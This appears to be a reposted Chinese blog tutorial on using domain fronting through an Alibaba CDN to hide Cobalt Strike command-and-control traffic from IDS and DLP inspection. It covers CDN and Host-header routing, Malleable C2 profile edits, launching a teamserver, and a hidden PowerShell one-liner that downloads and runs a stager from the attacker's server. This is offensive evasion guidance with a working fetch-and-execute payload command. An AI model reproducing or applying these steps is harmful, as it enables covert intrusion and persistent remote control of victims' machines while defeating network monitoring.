域前置Cobalt Strike逃避IDS审计
Posted Tenet@1014
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了域前置Cobalt Strike逃避IDS审计相关的知识,希望对你有一定的参考价值。
域前置Cobalt Strike逃避IDS审计
域前置简介
域前置(Domain Fronting)基于HTTPS通用规避技术,也被称为域前端网络攻击技术。
这是一种用来隐藏Metasploit、Cobalt Strike等团队控制服务器流量,以此来一定程度绕过检查器或防火墙检测的技术,如Amazon、Google、Akamai等大型厂商会提供一些域前端技术服务。
域前置技术原理(CDN分发)
通过CDN节点将流量转发到真实的C2服务器,其中CDN节点IP通过识别请求的HOST头进行流量转发,利用我们配置域名的高可信度,如我们可以设置一个微软的子域名,可以有效的躲避DLP、agent等流量检测。原理如下
工作原理(也就是CDN工作原理)
域前置的核心是CDN
CDN工作原理:
同一个IP可以被不同的域名进行绑定加速,再通过HTTP请求包头里的HOST域名来确定访问哪一个。
比如我们ping www.dcpc.com
得到IP:1.81.2.59
通过IP反查域名,可以看到很多域名绑定在这个IP上,这个就是CDN
www.3636.com和www.youka.la都是这个CDN服务器下的域名并且都保定了别名进行CND加速
通过curl访问网页,可以看到HOST头域名
curl -v www.3636.com
指定HOST
curl 1.81.2.59 -H "host:www.3636.com" -v
可以看到,依然可以访问到
如果IP没有绑定HOST www.3636.com,那么就无法访问
(一句话说明:CDN是通过HOST来判断你要访问那个网站的)
当访问www.3636.com这个域名的时候,实际上也是访问同一个CDN服务器,它的IP也是1.81.2.59
此处把IP替换为www.youka.la依然可以访问,并且内容一致
因为是CND服务器,所以会隐藏真实IP,所以C2服务器的真实IP可以得到隐藏保护。
域前置操作
备案域名1个
免费SSL申请:https://help.aliyun.com/document_detail/156645.html?spm=a2c6h.12873639.0.0.52105de0zFR8Tc&source=5176.11533457&userCode=r3yteowb
阿里云CDN控制中心:https://cdn.console.aliyun.com/overview
设置CDN
解析设置
CDN设置
多地ping测试,可以看到多个IP
配置Cobalt Strike
修改C2的profile配置文件
下载C2:https://github.com/xx0hcd/Malleable-C2-Profiles
选择合适的profile文件,修改HOST头为准备好的域名(get和post都要改)
可以CTRL+F 然后全部替换
月师傅的
用c2lint检查一下
./c2lint cdn.profile
开启teamserver
nohup ./teamserver xxx.xx.xx.99 qweqweqwe999 cdn.profile
nohub表示不挂断的运行命令,不然shell断了CS也会连接不上
kali上启动Cobalt Strike
开启监听
生成后门
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1xx.xx.xx.99:8080/a'))"
实际使用中,不能直接把真实IP暴露出来,应该另存为网页,通过其他IP进行访问
成功加密
以上是关于域前置Cobalt Strike逃避IDS审计的主要内容,如果未能解决你的问题,请参考以下文章
Cobalt Strike生成证书,修改C2 profile流量加密混淆